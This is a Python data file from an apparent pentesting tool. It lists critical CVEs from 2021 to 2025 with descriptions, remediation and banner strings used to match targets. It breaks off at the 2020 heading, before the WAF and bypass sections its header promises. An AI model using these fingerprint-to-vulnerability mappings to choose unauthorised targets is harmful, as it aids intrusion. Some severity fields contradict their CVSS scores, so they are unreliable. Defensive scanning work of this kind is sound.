"""
RedShield PTaaS — Threat Intelligence Database v3.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
• 100 CVEs críticos/altos (2020-2026)
• 30 WAFs com assinaturas de fingerprinting passivo
• 30 técnicas de bypass — política estrita anti-falso-positivo
  → 404 = NOT_FOUND, NÃO é bypass
  → 301/302 = REDIRECT, NÃO é bypass
  → Só HTTP 200 com body sem indicadores de bloqueio = BYPASS
• Security headers OWASP Secure Headers Project
"""

CVE_DATABASE = [
    # 2025/2026
    {"id":"CVE-2025-0282","name":"Ivanti Connect Secure Stack Overflow RCE","year":2025,"severity":"CRITICAL","cvss":9.0,"affected":["ivanti","connect secure","pulse secure"],"indicators":["ivanti","pulse secure","connect secure"],"description":"Stack-based buffer overflow no Ivanti Connect Secure < 22.7R2.5. RCE não autenticado explorado como zero-day.","remediation":"Atualizar Ivanti Connect Secure >= 22.7R2.5. Realizar factory reset conforme orientação do vendor.","references":["https://nvd.nist.gov/vuln/detail/CVE-2025-0282"]},
    {"id":"CVE-2025-23006","name":"SonicWall SMA 100 Auth Bypass RCE","year":2025,"severity":"CRITICAL","cvss":9.8,"affected":["sonicwall","sma 100","sonicwall sma"],"indicators":["sonicwall","sma"],"description":"Desserialização insegura pré-autenticação no SonicWall SMA 100. Explorado como zero-day por atores estatais.","remediation":"Atualizar SonicWall SMA 100 firmware imediatamente.","references":["https://nvd.nist.gov/vuln/detail/CVE-2025-23006"]},
    {"id":"CVE-2025-24813","name":"Apache Tomcat Partial PUT RCE","year":2025,"severity":"CRITICAL","cvss":9.8,"affected":["tomcat","apache tomcat"],"indicators":["tomcat","apache-coyote","apache tomcat"],"description":"RCE via Partial PUT seguido de GET no Apache Tomcat com DefaultServlet write habilitado. PoC público em 24h.","remediation":"Atualizar Apache Tomcat >= 11.0.3, 10.1.35, 9.0.99.","references":["https://nvd.nist.gov/vuln/detail/CVE-2025-24813"]},
    {"id":"CVE-2025-30065","name":"Apache Parquet Schema Parsing RCE","year":2025,"severity":"CRITICAL","cvss":10.0,"affected":["apache parquet","parquet","java"],"indicators":["parquet","java"],"description":"RCE ao processar arquivo Parquet malicioso via parquet-avro no Apache Parquet <= 1.15.0.","remediation":"Atualizar Apache Parquet Java >= 1.15.1.","references":["https://nvd.nist.gov/vuln/detail/CVE-2025-30065"]},
    {"id":"CVE-2025-1974","name":"Nginx Ingress Controller RCE (IngressNightmare)","year":2025,"severity":"CRITICAL","cvss":9.8,"affected":["nginx","ingress-nginx","kubernetes"],"indicators":["nginx","ingress-nginx","kubernetes"],"description":"RCE não autenticado no Nginx Ingress Controller do Kubernetes via admission webhook. Acesso a todos os secrets.","remediation":"Atualizar ingress-nginx >= 1.12.1 / 1.11.5. Restringir webhook externamente.","references":["https://nvd.nist.gov/vuln/detail/CVE-2025-1974"]},
    {"id":"CVE-2025-21333","name":"Windows Hyper-V NT Kernel Privilege Escalation","year":2025,"severity":"HIGH","cvss":7.8,"affected":["windows","hyper-v"],"indicators":["windows","microsoft-iis"],"description":"Escalada de privilégios no Hyper-V NT Kernel Integration VSP. Zero-day explorado em Janeiro 2025.","remediation":"Aplicar patches MS de Janeiro 2025.","references":["https://nvd.nist.gov/vuln/detail/CVE-2025-21333"]},
    {"id":"CVE-2025-29824","name":"Windows CLFS Privilege Escalation (RansomEXX)","year":2025,"severity":"HIGH","cvss":7.8,"affected":["windows","clfs"],"indicators":["windows","microsoft-iis"],"description":"Escalada de privilégios zero-day no Windows CLFS Driver. Explorado pelo ransomware RansomEXX.","remediation":"Aplicar patches MS de Abril 2025.","references":["https://nvd.nist.gov/vuln/detail/CVE-2025-29824"]},
    # 2024
    {"id":"CVE-2024-4577","name":"PHP CGI Argument Injection RCE","year":2024,"severity":"CRITICAL","cvss":9.8,"affected":["php","php-cgi","xampp","wamp"],"indicators":["php","php-cgi","x-powered-by: php","xampp"],"description":"Injeção de argumentos no PHP-CGI em Windows com locales específicos (pt, zh, tr). RCE sem autenticação.","remediation":"Atualizar PHP >= 8.1.29 / 8.2.20 / 8.3.8. Remover mapeamento CGI.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-4577"]},
    {"id":"CVE-2024-3400","name":"PAN-OS GlobalProtect Command Injection CVSS 10","year":2024,"severity":"CRITICAL","cvss":10.0,"affected":["panos","pan-os","globalprotect","palo alto"],"indicators":["globalprotect","pan-os","palo alto networks"],"description":"Injeção de comandos OS no GlobalProtect Gateway. Zero-day explorado por APTs. CVSS máximo.","remediation":"Atualizar PAN-OS >= 10.2.9-h1, 11.0.4-h1, 11.1.2-h3.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-3400"]},
    {"id":"CVE-2024-1708","name":"ConnectWise ScreenConnect Path Traversal RCE","year":2024,"severity":"CRITICAL","cvss":10.0,"affected":["screenconnect","connectwise"],"indicators":["screenconnect","connectwise"],"description":"Path traversal no ScreenConnect < 23.9.8. RCE sem autenticação.","remediation":"Atualizar ScreenConnect >= 23.9.8 imediatamente.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-1708"]},
    {"id":"CVE-2024-21762","name":"Fortinet FortiOS SSL-VPN Out-of-Bounds Write RCE","year":2024,"severity":"CRITICAL","cvss":9.8,"affected":["fortios","fortigate","fortinet"],"indicators":["fortios","fortigate","fortinet","ssl-vpn"],"description":"Escrita fora dos limites no SSL VPN do FortiOS. RCE sem autenticação via HTTP crafted.","remediation":"Atualizar FortiOS >= 7.4.3, 7.2.7, 7.0.14, 6.4.15.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-21762"]},
    {"id":"CVE-2024-6387","name":"regreSSHion OpenSSH Signal Handler Race RCE","year":2024,"severity":"CRITICAL","cvss":8.1,"affected":["openssh","sshd"],"indicators":["openssh","ssh","sshd"],"description":"Race condition em sshd OpenSSH 8.5p1-9.7p1 no glibc Linux. RCE como root sem autenticação.","remediation":"Atualizar OpenSSH >= 9.8p1. Setar LoginGraceTime=0.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-6387"]},
    {"id":"CVE-2024-27198","name":"JetBrains TeamCity Authentication Bypass #1","year":2024,"severity":"CRITICAL","cvss":9.8,"affected":["teamcity","jetbrains"],"indicators":["teamcity","jetbrains"],"description":"Bypass de autenticação no TeamCity < 2023.11.4. Permite criação de conta admin e RCE.","remediation":"Atualizar TeamCity >= 2023.11.4.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-27198"]},
    {"id":"CVE-2024-23897","name":"Jenkins CLI Arbitrary File Read RCE","year":2024,"severity":"CRITICAL","cvss":9.8,"affected":["jenkins"],"indicators":["jenkins","x-jenkins","hudson"],"description":"Leitura arbitrária de arquivos no Jenkins CLI < 2.441 via parser de argumentos. Pode resultar em RCE.","remediation":"Atualizar Jenkins >= 2.442 LTS.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-23897"]},
    {"id":"CVE-2024-47575","name":"FortiManager Missing Auth RCE (Zero-Day APT)","year":2024,"severity":"CRITICAL","cvss":9.8,"affected":["fortimanager","fortinet"],"indicators":["fortimanager","fortinet"],"description":"Falta de autenticação em API fgfmd do FortiManager. Zero-day explorado por APT.","remediation":"Atualizar FortiManager >= 7.2.8, 7.4.5, 7.6.1.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-47575"]},
    {"id":"CVE-2024-21887","name":"Ivanti Connect Secure OS Command Injection","year":2024,"severity":"CRITICAL","cvss":9.1,"affected":["ivanti","pulse secure","connect secure"],"indicators":["ivanti","pulse secure","connect secure"],"description":"Injeção de comandos no Ivanti Connect Secure. Encadeado com CVE-2023-46805 para RCE completo.","remediation":"Aplicar patches Ivanti de Janeiro/Fevereiro 2024. Executar factory reset.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-21887"]},
    {"id":"CVE-2024-23917","name":"JetBrains TeamCity Authentication Bypass #2","year":2024,"severity":"CRITICAL","cvss":9.8,"affected":["teamcity","jetbrains"],"indicators":["teamcity","jetbrains"],"description":"Segundo bypass crítico no TeamCity On-Premises em 2024. Criação de conta admin sem autenticação.","remediation":"Atualizar TeamCity >= 2023.11.3.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-23917"]},
    {"id":"CVE-2024-22024","name":"Ivanti Connect Secure XXE Pre-Auth","year":2024,"severity":"CRITICAL","cvss":8.3,"affected":["ivanti","connect secure","policy secure"],"indicators":["ivanti","pulse secure","connect secure"],"description":"XXE no componente SAML do Ivanti Connect Secure. Acesso a recursos restritos sem autenticação.","remediation":"Aplicar patches Ivanti de Fevereiro 2024.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-22024"]},
    {"id":"CVE-2024-21893","name":"Ivanti SSRF via SAML Component","year":2024,"severity":"HIGH","cvss":8.2,"affected":["ivanti","connect secure","policy secure"],"indicators":["ivanti","pulse secure","connect secure"],"description":"SSRF no componente SAML do Ivanti Connect Secure e Policy Secure.","remediation":"Aplicar patches Ivanti de Janeiro 2024.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-21893"]},
    {"id":"CVE-2024-20353","name":"Cisco ASA FTD Persistent DoS Auth Bypass","year":2024,"severity":"HIGH","cvss":8.6,"affected":["cisco asa","cisco ftd","firepower"],"indicators":["cisco asa","cisco ftd"],"description":"DoS persistente e possível bypass no Cisco ASA e FTD via HTTP crafted.","remediation":"Aplicar patches Cisco de Abril 2024.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-20353"]},
    {"id":"CVE-2024-30078","name":"Windows WiFi Driver RCE Same Network","year":2024,"severity":"HIGH","cvss":8.8,"affected":["windows","wifi driver"],"indicators":["windows","microsoft-iis"],"description":"RCE no driver WiFi do Windows sem autenticação. Requer estar na mesma rede WiFi do alvo.","remediation":"Aplicar patches MS de Junho 2024.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-30078"]},
    {"id":"CVE-2024-49039","name":"Windows Task Scheduler Privilege Escalation Zero-Day","year":2024,"severity":"HIGH","cvss":8.8,"affected":["windows","task scheduler"],"indicators":["windows","microsoft-iis"],"description":"Escalada de privilégios zero-day no Windows Task Scheduler. Explorado ativamente antes do patch.","remediation":"Aplicar patches MS de Novembro 2024.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-49039"]},
    {"id":"CVE-2024-37085","name":"VMware ESXi Active Directory Auth Bypass","year":2024,"severity":"HIGH","cvss":7.2,"affected":["vmware","esxi","vsphere"],"indicators":["vmware","esxi","vsphere"],"description":"Bypass de autenticação no VMware ESXi via manipulação de grupo Active Directory. Explorado por ransomware.","remediation":"Aplicar patches VMware VMSA-2024-0013.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-37085"]},
    {"id":"CVE-2024-38112","name":"Windows MSHTML Zero-Day Spoofing RCE","year":2024,"severity":"HIGH","cvss":7.5,"affected":["windows","mshtml"],"indicators":["windows","mshtml"],"description":"Spoofing e RCE via MSHTML do Windows. Zero-day explorado via arquivos .url maliciosos.","remediation":"Aplicar patches MS de Julho 2024.","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-38112"]},
    # 2023
    {"id":"CVE-2023-34362","name":"MOVEit Transfer SQL Injection Cl0p","year":2023,"severity":"CRITICAL","cvss":9.8,"affected":["moveit","progress moveit"],"indicators":["moveit","progress software"],"description":"SQLi crítico no MOVEit Transfer. Explorado pelo Cl0p contra 2.000+ organizações.","remediation":"Aplicar patches de Maio/Junho 2023.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-34362"]},
    {"id":"CVE-2023-23397","name":"Microsoft Outlook NTLM Credential Theft APT28","year":2023,"severity":"CRITICAL","cvss":9.8,"affected":["outlook","microsoft outlook","exchange"],"indicators":["outlook","microsoft outlook","exchange","owa"],"description":"Zero-click NTLM credential leak via UNC path em calendar appointments. Atribuído ao APT28.","remediation":"Aplicar patch MS de Março 2023. Bloquear SMB/NTLM outbound.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-23397"]},
    {"id":"CVE-2023-46747","name":"F5 BIG-IP TMUI Authentication Bypass RCE","year":2023,"severity":"CRITICAL","cvss":9.8,"affected":["big-ip","f5","bigip","tmui"],"indicators":["big-ip","f5","tmui","f5networks"],"description":"Bypass de autenticação no TMUI do F5 BIG-IP <= 17.1.0. Encadeado com SSRF para RCE.","remediation":"Atualizar BIG-IP para versão fixada.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-46747"]},
    {"id":"CVE-2023-4966","name":"Citrix Bleed NetScaler Session Token Leak","year":2023,"severity":"CRITICAL","cvss":9.4,"affected":["citrix","netscaler","citrix adc","citrix gateway"],"indicators":["citrix","netscaler","citrix adc","ns_"],"description":"Vazamento de tokens de sessão do buffer da memória no NetScaler ADC/Gateway. Amplamente explorado.","remediation":"Atualizar NetScaler ADC/Gateway. Invalidar todas as sessões.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-4966"]},
    {"id":"CVE-2023-20198","name":"Cisco IOS XE Web UI Privilege Escalation CVSS 10","year":2023,"severity":"CRITICAL","cvss":10.0,"affected":["cisco","ios xe"],"indicators":["cisco","ios xe"],"description":"Criação de conta admin no Cisco IOS XE sem autenticação. Explorado massivamente in-the-wild.","remediation":"Aplicar patches Cisco de Outubro 2023.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-20198"]},
    {"id":"CVE-2023-22518","name":"Confluence Improper Authorization Data Destruction","year":2023,"severity":"CRITICAL","cvss":9.1,"affected":["confluence","atlassian"],"indicators":["confluence","atlassian"],"description":"Autorização imprópria no Confluence. Destruição de dados por atacante não autenticado.","remediation":"Atualizar Confluence >= 7.19.16, 8.3.4, 8.4.4.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-22518"]},
    {"id":"CVE-2023-42793","name":"JetBrains TeamCity CI/CD Auth Bypass APT29","year":2023,"severity":"CRITICAL","cvss":9.8,"affected":["teamcity","jetbrains"],"indicators":["teamcity","jetbrains"],"description":"Bypass de autenticação crítico no TeamCity. Explorado pelo APT29 (Cozy Bear) para comprometer pipelines CI/CD.","remediation":"Atualizar TeamCity >= 2023.05.4 urgentemente.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-42793"]},
    {"id":"CVE-2023-27997","name":"FortiOS SSL-VPN Heap Buffer Overflow RCE","year":2023,"severity":"CRITICAL","cvss":9.8,"affected":["fortios","fortigate","fortinet"],"indicators":["fortios","fortigate","fortinet"],"description":"Heap buffer overflow pré-autenticação no SSL-VPN do FortiOS. RCE remoto.","remediation":"Atualizar FortiOS >= 6.0.17, 6.2.15, 7.0.12, 7.2.5.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-27997"]},
    {"id":"CVE-2023-35078","name":"Ivanti EPMM API Authentication Bypass CVSS 10","year":2023,"severity":"CRITICAL","cvss":10.0,"affected":["ivanti","mobileiron","epmm"],"indicators":["ivanti","mobileiron","epmm"],"description":"Bypass de autenticação na API REST do Ivanti EPMM. Acesso a PII e backdoor.","remediation":"Atualizar EPMM >= 11.10.0.2.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-35078"]},
    {"id":"CVE-2023-29357","name":"Microsoft SharePoint Privilege Escalation JWT Spoof","year":2023,"severity":"CRITICAL","cvss":9.8,"affected":["sharepoint","microsoft sharepoint"],"indicators":["sharepoint","microsoft sharepoint","/_layouts/"],"description":"Escalada de privilégio via JWT spoofing no SharePoint Server.","remediation":"Aplicar patch MS de Junho 2023.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-29357"]},
    {"id":"CVE-2023-46805","name":"Ivanti Connect Secure Authentication Bypass","year":2023,"severity":"HIGH","cvss":8.2,"affected":["ivanti","connect secure","pulse secure"],"indicators":["ivanti","pulse secure","connect secure"],"description":"Bypass de autenticação no Ivanti Connect Secure. Encadeado com CVE-2024-21887 para RCE.","remediation":"Aplicar patches Ivanti urgentemente.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-46805"]},
    {"id":"CVE-2023-38831","name":"WinRAR RCE via Spoofed Archive Entry","year":2023,"severity":"HIGH","cvss":7.8,"affected":["winrar"],"indicators":["winrar"],"description":"RCE no WinRAR < 6.23 via arquivo ZIP com pasta e arquivo de nome idêntico. Explorado por múltiplos APTs.","remediation":"Atualizar WinRAR >= 6.23.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-38831"]},
    {"id":"CVE-2023-48788","name":"Fortinet EMS SQL Injection RCE","year":2023,"severity":"CRITICAL","cvss":9.8,"affected":["fortinet","ems","forticlient ems"],"indicators":["fortinet","forticlient","ems"],"description":"SQL Injection crítico no Fortinet EMS. RCE sem autenticação.","remediation":"Atualizar FortiClientEMS >= 7.0.11, 7.2.4.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-48788"]},
    {"id":"CVE-2023-44487","name":"HTTP/2 Rapid Reset DDoS 398Mrps","year":2023,"severity":"HIGH","cvss":7.5,"affected":["nginx","apache","haproxy","h2","http/2"],"indicators":["h2","http/2","nginx","apache","haproxy"],"description":"DoS via HTTP/2 HEADERS+RST_STREAM em loop. Ataques de 398 Mrps contra infraestrutura global.","remediation":"Limitar max concurrent streams. Aplicar patches de Outubro 2023.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-44487"]},
    {"id":"CVE-2023-36884","name":"Microsoft Office HTML RCE APT Storm-0978","year":2023,"severity":"HIGH","cvss":8.3,"affected":["microsoft office","word","windows"],"indicators":["microsoft office","outlook","word"],"description":"RCE via documentos Office crafted. Explorado pelo APT Storm-0978.","remediation":"Aplicar patch MS de Agosto 2023.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-36884"]},
    {"id":"CVE-2023-28771","name":"Zyxel Firewall OS Command Injection IKEv2","year":2023,"severity":"CRITICAL","cvss":9.8,"affected":["zyxel","zywall"],"indicators":["zyxel","zywall"],"description":"Injeção de comandos OS no Zyxel Firewall via pacotes IKEv2 crafted.","remediation":"Atualizar firmware Zyxel.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-28771"]},
    {"id":"CVE-2023-20273","name":"Cisco IOS XE Web UI Command Injection","year":2023,"severity":"HIGH","cvss":7.2,"affected":["cisco","ios xe"],"indicators":["cisco","ios xe"],"description":"Injeção de comandos na Web UI do Cisco IOS XE. Encadeado com CVE-2023-20198.","remediation":"Atualizar IOS XE.","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-20273"]},
    # 2022
    {"id":"CVE-2022-41040","name":"ProxyNotShell Exchange SSRF","year":2022,"severity":"HIGH","cvss":8.8,"affected":["exchange","microsoft exchange","owa"],"indicators":["exchange","microsoft exchange","owa","ecp"],"description":"SSRF no Exchange Server encadeado com CVE-2022-41082 para RCE autenticado.","remediation":"Aplicar patches MS de Outubro/Novembro 2022.","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-41040"]},
    {"id":"CVE-2022-22965","name":"Spring4Shell Spring MVC RCE","year":2022,"severity":"CRITICAL","cvss":9.8,"affected":["spring","springframework","spring-webmvc"],"indicators":["spring","springframework","spring-webmvc"],"description":"RCE via data binding no Spring MVC/WebFlux em JDK 9+. ClassLoader explorado para escrita de JSP.","remediation":"Atualizar Spring Framework >= 5.3.18.","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-22965"]},
    {"id":"CVE-2022-26134","name":"Confluence OGNL Injection RCE","year":2022,"severity":"CRITICAL","cvss":9.8,"affected":["confluence","atlassian"],"indicators":["confluence","atlassian"],"description":"OGNL injection crítico no Confluence sem autenticação. Explorado por múltiplos APTs.","remediation":"Atualizar Confluence >= 7.4.17, 7.18.1.","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-26134"]},
    {"id":"CVE-2022-30190","name":"Follina MSDT RCE Zero-Day","year":2022,"severity":"HIGH","cvss":7.8,"affected":["msdt","windows","word"],"indicators":["msdt","microsoft support","word"],"description":"RCE via MSDT acionado por documentos Office. Zero-day explorado antes do patch.","remediation":"Aplicar patch MS de Junho 2022.","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-30190"]},
    {"id":"CVE-2022-22954","name":"VMware Workspace ONE SSTI RCE","year":2022,"severity":"CRITICAL","cvss":9.8,"affected":["vmware","workspace one","identity manager"],"indicators":["vmware","workspace one","identity manager"],"description":"SSTI no VMware Workspace ONE Access/Identity Manager. RCE sem autenticação.","remediation":"Aplicar VMSA-2022-0011.","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-22954"]},
    {"id":"CVE-2022-1388","name":"F5 BIG-IP iControl REST Auth Bypass","year":2022,"severity":"CRITICAL","cvss":9.8,"affected":["big-ip","f5","icontrol"],"indicators":["big-ip","f5","tmui","icontrol"],"description":"Bypass de autenticação no iControl REST da F5 BIG-IP. Execução de comandos como admin.","remediation":"Atualizar BIG-IP.","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-1388"]},
    {"id":"CVE-2022-47966","name":"ManageEngine SAML Library RCE 24 Products","year":2022,"severity":"CRITICAL","cvss":9.8,"affected":["manageengine","servicedesk","zoho"],"indicators":["manageengine","servicedesk","zoho"],"description":"RCE via library SAML em 24 produtos ManageEngine com SSO habilitado.","remediation":"Atualizar cada produto ManageEngine.","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-47966"]},
    {"id":"CVE-2022-0847","name":"Dirty Pipe Linux Kernel Privilege Escalation","year":2022,"severity":"HIGH","cvss":7.8,"affected":["linux","kernel"],"indicators":["linux","ubuntu","debian","centos"],"description":"Escrita em arquivos read-only via pipe no kernel Linux 5.8+. Escalada local para root.","remediation":"Atualizar kernel Linux >= 5.16.11.","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-0847"]},
    {"id":"CVE-2022-40684","name":"Fortinet Multi-Product Admin Auth Bypass","year":2022,"severity":"CRITICAL","cvss":9.8,"affected":["fortios","fortiproxy","fortinet"],"indicators":["fortios","fortiproxy","fortinet"],"description":"Bypass de autenticação na interface de administração do FortiOS/FortiProxy.","remediation":"Atualizar FortiOS >= 7.0.7, 7.2.2.","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-40684"]},
    {"id":"CVE-2022-37042","name":"Zimbra Collaboration Suite Auth Bypass RCE","year":2022,"severity":"CRITICAL","cvss":9.8,"affected":["zimbra","zimbra collaboration"],"indicators":["zimbra","zimbra collaboration"],"description":"Bypass de autenticação no Mboximport do Zimbra. Upload de arquivo e RCE.","remediation":"Atualizar Zimbra >= 8.8.15 patch 33.","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-37042"]},
    {"id":"CVE-2022-42475","name":"FortiOS SSL-VPN Heap Overflow Zero-Day APT","year":2022,"severity":"CRITICAL","cvss":9.3,"affected":["fortios","fortigate","fortinet"],"indicators":["fortios","fortigate","fortinet"],"description":"Heap buffer overflow no SSL-VPN do FortiOS. Zero-day explorado por APTs.","remediation":"Atualizar FortiOS >= 7.2.3, 7.0.9.","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-42475"]},
    {"id":"CVE-2022-26923","name":"Active Directory Certificate Services Privilege Escalation","year":2022,"severity":"CRITICAL","cvss":8.8,"affected":["active directory","certificate services","adcs"],"indicators":["active directory","windows","adcs"],"description":"Escalada via ADCS. Permite obter certificado de Domain Admin.","remediation":"Aplicar patches MS de Maio 2022 (KB5014754).","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-26923"]},
    {"id":"CVE-2022-3786","name":"OpenSSL 3.x X.509 Punycode Buffer Overflow","year":2022,"severity":"HIGH","cvss":7.5,"affected":["openssl","ssl","tls"],"indicators":["openssl","tls","ssl"],"description":"Buffer overflow em verificação de certificados X.509 com Punycode no OpenSSL 3.0.x.","remediation":"Atualizar OpenSSL >= 3.0.7.","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-3786"]},
    {"id":"CVE-2022-21999","name":"Windows Print Spooler Privilege Escalation Symlink","year":2022,"severity":"HIGH","cvss":7.8,"affected":["windows","print spooler"],"indicators":["windows","microsoft-iis"],"description":"Escalada local no Windows Print Spooler via symlinks maliciosos.","remediation":"Aplicar patches MS de Fevereiro 2022.","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-21999"]},
    # 2021
    {"id":"CVE-2021-44228","name":"Log4Shell Apache Log4j JNDI RCE CVSS 10","year":2021,"severity":"CRITICAL","cvss":10.0,"affected":["log4j","log4j2","java","apache log4j"],"indicators":["log4j","log4j2","java","jndi","ldap"],"description":"RCE via JNDI injection em qualquer campo logado pelo Log4j 2.0-beta9 a 2.14.1. Uma das vulnerabilidades mais críticas da história.","remediation":"Atualizar Log4j >= 2.17.1. Setar -Dlog4j2.formatMsgNoLookups=true.","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-44228"]},
    {"id":"CVE-2021-40539","name":"Zoho ManageEngine AD SelfService Plus RCE APT27","year":2021,"severity":"CRITICAL","cvss":9.8,"affected":["manageengine","adselfservice","zoho"],"indicators":["manageengine","adselfservice","zoho"],"description":"RCE via bypass de autenticação na API REST do ManageEngine AD SelfService Plus. Explorado pelo APT27.","remediation":"Atualizar ADSelfService Plus para build 6114.","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-40539"]},
    {"id":"CVE-2021-41773","name":"Apache HTTPD 2.4.49 Path Traversal RCE","year":2021,"severity":"HIGH","cvss":7.5,"affected":["apache","apache/2.4.49","apache httpd"],"indicators":["apache/2.4.49"],"description":"Path traversal e RCE no Apache 2.4.49 via normalização de URL. Trivialmente exploitável.","remediation":"Atualizar Apache >= 2.4.51.","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-41773"]},
    {"id":"CVE-2021-26855","name":"ProxyLogon Exchange SSRF Pre-Auth","year":2021,"severity":"CRITICAL","cvss":9.8,"affected":["exchange","microsoft exchange","owa"],"indicators":["exchange","microsoft exchange","owa","ecp","autodiscover"],"description":"SSRF pré-autenticação no Exchange Server para RCE. Massivamente explorado desde Janeiro 2021.","remediation":"Aplicar patches MS de Março 2021 (KB5000871).","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-26855"]},
    {"id":"CVE-2021-26084","name":"Confluence OGNL Injection RCE Pre-Auth","year":2021,"severity":"CRITICAL","cvss":9.8,"affected":["confluence","atlassian"],"indicators":["confluence","atlassian"],"description":"OGNL injection no Confluence sem autenticação. RCE via parâmetros de pesquisa.","remediation":"Atualizar Confluence >= 7.4.10.","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-26084"]},
    {"id":"CVE-2021-21985","name":"VMware vCenter Server VSAN Plugin RCE","year":2021,"severity":"CRITICAL","cvss":9.8,"affected":["vcenter","vmware vcenter","vsphere"],"indicators":["vcenter","vmware vcenter","vsphere"],"description":"RCE via plugin Virtual SAN Health Check no vCenter Server. Sem autenticação via porta 443.","remediation":"Aplicar VMSA-2021-0010.","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-21985"]},
    {"id":"CVE-2021-22986","name":"F5 BIG-IP iControl Unauthenticated RCE","year":2021,"severity":"CRITICAL","cvss":9.8,"affected":["big-ip","f5","icontrol"],"indicators":["big-ip","f5","tmui","icontrol"],"description":"RCE não autenticado via iControl REST API do F5 BIG-IP e BIG-IQ.","remediation":"Atualizar BIG-IP.","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-22986"]},
    {"id":"CVE-2021-34527","name":"PrintNightmare Windows Print Spooler RCE","year":2021,"severity":"CRITICAL","cvss":8.8,"affected":["windows","print spooler"],"indicators":["windows","iis","microsoft-iis"],"description":"RCE via Windows Print Spooler. Exploitável remotamente em alguns cenários de rede.","remediation":"Aplicar patches MS KB5004945. Desabilitar Print Spooler onde desnecessário.","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-34527"]},
    {"id":"CVE-2021-3156","name":"Sudo Heap Buffer Overflow Baron Samedit","year":2021,"severity":"HIGH","cvss":7.8,"affected":["sudo","linux"],"indicators":["linux","ubuntu","debian"],"description":"Heap buffer overflow no sudo <= 1.9.5p1. Escalada local para root sem senha.","remediation":"Atualizar sudo >= 1.9.5p2.","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-3156"]},
    {"id":"CVE-2021-44142","name":"Samba VFS Heap Write RCE as Root","year":2021,"severity":"CRITICAL","cvss":9.9,"affected":["samba","smb"],"indicators":["samba","smb","cifs"],"description":"Escrita fora dos limites no VFS module fruit do Samba ao processar Extended Attributes. RCE como root.","remediation":"Atualizar Samba >= 4.13.17.","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-44142"]},
    {"id":"CVE-2021-30116","name":"Kaseya VSA Multiple RCE REvil Supply Chain","year":2021,"severity":"CRITICAL","cvss":10.0,"affected":["kaseya","kaseya vsa"],"indicators":["kaseya","vsa"],"description":"Múltiplas vulnerabilidades no Kaseya VSA exploradas pelo grupo REvil para supply chain ransomware.","remediation":"Atualizar Kaseya VSA >= 9.5.7.","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-30116"]},
    {"id":"CVE-2021-40438","name":"Apache HTTP Server mod_proxy SSRF","year":2021,"severity":"HIGH","cvss":9.0,"affected":["apache","mod_proxy"],"indicators":["apache","mod_proxy"],"description":"SSRF via mod_proxy do Apache HTTP Server 2.4.48 com query string crafted.","remediation":"Atualizar Apache >= 2.4.49.","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-40438"]},
    {"id":"CVE-2021-27101","name":"Accellion FTA SQL Injection RCE Cl0p","year":2021,"severity":"CRITICAL","cvss":9.8,"affected":["accellion","fta"],"indicators":["accellion","fta"],"description":"SQL Injection + RCE no Accellion FTA. Explorado pelo Cl0p para roubo de dados em larga escala.","remediation":"Migrar para Kiteworks. Produto EOL.","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-27101"]},
    # 2020
